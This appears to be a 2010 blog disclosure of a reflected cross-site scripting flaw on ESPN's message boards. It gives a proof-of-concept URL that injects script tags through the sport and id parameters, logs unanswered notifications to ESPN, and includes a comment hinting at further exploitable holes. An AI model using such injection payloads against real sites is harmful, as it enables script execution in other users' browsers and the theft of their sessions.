Sunday, September 12, 2010

ESPN Global Cross Site Scripting (XSS)


+++About ESPN Global+++
http://espn.go.com

+++Affected URL(s)+++
http://boards.espn.go.com

+++Vulnerable Parameter / Function+++
sport
id
nav

+++PoC+++
http://boards.espn.go.com/boards/mb/mb?sport=espn'><script>alert('XSS from sport')</script>&id=index'><script>alert('XSS from id')</script>

ESPN Global Ist Notified:    January 2010
           IInd Notification:    September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)

Best Regards.

2 comments:

  1. Wonderful blog! I found it while searching on Yahoo News. Do you have any tips on how to get listed in Yahoo News? I’ve been trying for a while but I never seem to get there! Many thanks.sbobet

    ReplyDelete
  2. Hey there, Thanks for your comments.

    I dunno what you're asking about. But there are a few XSS in there too. If you can find them, you may be able to use them.

    KG

    ReplyDelete

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.